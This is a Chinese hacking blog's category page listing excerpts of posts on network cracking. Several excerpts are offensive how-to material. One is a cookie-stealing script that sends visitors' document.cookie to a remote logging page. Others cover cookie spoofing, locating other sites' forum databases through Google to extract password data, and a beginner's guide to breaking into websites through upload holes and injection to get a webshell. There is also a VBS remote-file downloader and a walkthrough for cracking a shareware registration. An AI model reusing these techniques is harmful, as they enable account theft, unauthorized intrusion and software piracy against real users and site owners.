木子屋 Dnawo's BLOG

分类:网络破解

共 44 篇

VBS脚本在系统安全中的八则巧妙应用

VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下,还可用WSH来访问Windows NT活动目录服务。      用VBS编写的脚本程序在窗口界面是由wscript.exe文件解释执行的,在字符界面由cscript.exe文件解释执行。wscript.exe是一个脚本语言解释器,正是它使得脚本可以被执行,就象执行批处理一样。关于VBS大家一定比我熟悉多了,所以再不废话,直接进入主题,看看我总结的VBS在系统安全中的八则妙用吧。…

Flash破解与加密

在一些名门论坛,谈论破解之术被明文禁止甚至会招来不尽的鄙视。我一直都对这个观点有种很异样的感觉。诚然,尊重原创是一种美德。然而对于不会说话的工具而言,其本身又岂会有善恶之分?有善恶之分的,是使用这些工具的人。 因为无法控制其中的尺度,只好一尽排斥,这是中国官方乃至国际官方一惯的作风。言论自由成为人人崇尚却又时时为其所害的一面幌子。自由,也有度。 破解和防破解是必将同时存在的对立体。如同制造病毒和防范病毒一样。因为制造病毒的言论从不会公开出现在一些名门场合,所以每当病毒来袭,防范的一方总是措不及防。这是当然,世上有几名黑客会自报家门? 幸运的是,Flash 破解是一种公开的技术。然而不幸的是,这种公开的技术却被鄙视为一种下流手段。说句公道话,这里面确实有一些正人君子,可是更有一些人前一套人后一套的道貌岸然之士。这让我想起一句话:“宁做真小心,不做伪君子。”…

将用户cookie保存到指定文件

前提条件是页面支持HTML,只要满足这一条件就可开工,这边共三个文件: getcookie.js:获取用户cookie并以地址参数形式发送至writecookie.asp页面; writecookie.asp:从地址参数中获取cookie值并保存至cookie.txt文件中; cookie.txt:保存cookie值; 两个文件的代码如下: getcookie.js: 为什么不用document.location.href='http://www.mzwu.com/writecookie.asp?coo=" + document.cookie + "&url=" + document.domain大家想想^_^…

cookie欺骗

现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 cookie欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1.跳过浏览器,直接对通讯数据改写 2.修改浏览器,让浏览器从本地可以读写任意域名cookie 3.使用签名脚本,让浏览器从本地可以读写任意域名cookie(有安全问题) 4.欺骗浏览器,让浏览器获得假的域名 其中: 方法1、2需要较专业的编程知识,对普通用户不太合适。…

对动网的一个误解

曾经尝试过暴力破解MD5密文,在不明所以的情况下,暴力破解成功率微乎其微,虽有传闻山东大学的王小云教授破译MD5加密法,但终究也未见什么先进的破解软件或算法出来,因而对MD5是非常信任的,一直也都认为只要密码设置复杂一些,数据库文件名以及路径改不改不是非常重要。注意密码一定要复杂一些,如果为纯数字10位以下的密码,有些破解软件几秒内就能破解出来的! 今天看了一篇文章说有些管理员没有及时的清空日志的习惯,而这些日志都保存在数据库中,才觉得事情没有想像中的简单,打开Google搜索data/dvbbs7.mdb,下载了一论坛数据库,打开Dv_log表,复制其l_content字段中的所有内容粘贴到记事本,搜索password,下边是我提取出来的关键信息: &width=32&height=32&oicq=&icq=&msn=&aim=&yahoo=&uc=&usertitle=&article=1&Userdel=0&userisbest=0&userm…

关于IE执行任意程序漏洞的深入分析

1. 漏洞回顾 2. 进一步追踪 3. IE可本地执行任意命令分析 4. IE的ActiveX安全设置可被绕过分析 5. 扩展:扩展:IE的DHTML实现中关于html源码再解析部分和IE的安全机制脱节 6. 临时解决方法 7. 测试环境 8. 参考 9. 感谢 漏洞回顾 Bugtraq 3867描述了IE允许恶意网站在浏览其网页的客户机上执行任意程序。 如果你不了解该漏洞的信息请参阅: http://magazine.nsfocus.com/detail.asp?id=1192 原文的示例简化如下: var oPopup = window.createPopup(); var oPopBody = oPopup.document.body;…

新人零起步接触黑客之网站入侵知识

昨天大家对黑客名词有了一些了解后,我们今天来介绍点别的东西,介绍点入侵时常见的名词和一些入侵的方法,好了不废话了下面开始。   首先介绍下什么样的站点可以入侵:必须是动态的网站,比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)。   入侵介绍: 1 上传漏洞;2 暴库;3 注入;4 旁注;5 COOKIE诈骗。   1 上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。   怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。…

用VBS可执行程序+Xmlhttp下载网络文件

'On Error Resume Next Dim iRemote,iLocal iRemote = InputBox("请输入远程文件路径:") Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() Set stream = CreateObject("ADODB.Stream") stream.Mode = 3 stream.Type = 1 stream.Open() stream.Write(xPost.responseBody) if (stream.size

反编译工具jad简单用法

以下假设jad.exe在c:\java目录下 一、基本用法 Usage:jad 直接输入类文件名,且支持通配符,如下所示。 c:\java\>jad example1.class c:\java\>jad *.class 结果是将example1.class反编译为example1.jad。将example1.jad改为example1.java即得源文件。 二、Option -o 不提示,覆盖源文件 三、Option -s c:\java\>jad -s java example1.class 反编译结果以.java为扩展名。 四、Option -p 将反编译结果输出到屏幕 c:\java\>jad -p example1.class…

用三种方法破解“ICO精灵V2.0”

软件介绍 ICO精灵V2.0是一款ICO图标的处理工具,它包含图标的提取和位图与图标批量互转功能。 下载地址 http://www.onlinedown.net/soft/8021.htm 注 册 费:15 RMB/套 使用限制:未注册只能用20次 ----------------------------------------------------------------------- 破解作者:我要 破解工具:TRW2000 UPX-GUI 1.20w Keymake1.73 方法一------→修改*.ini文件 这个是第一次运行软件后,在C:\ 目录下生成的boots.ini文件: A=1…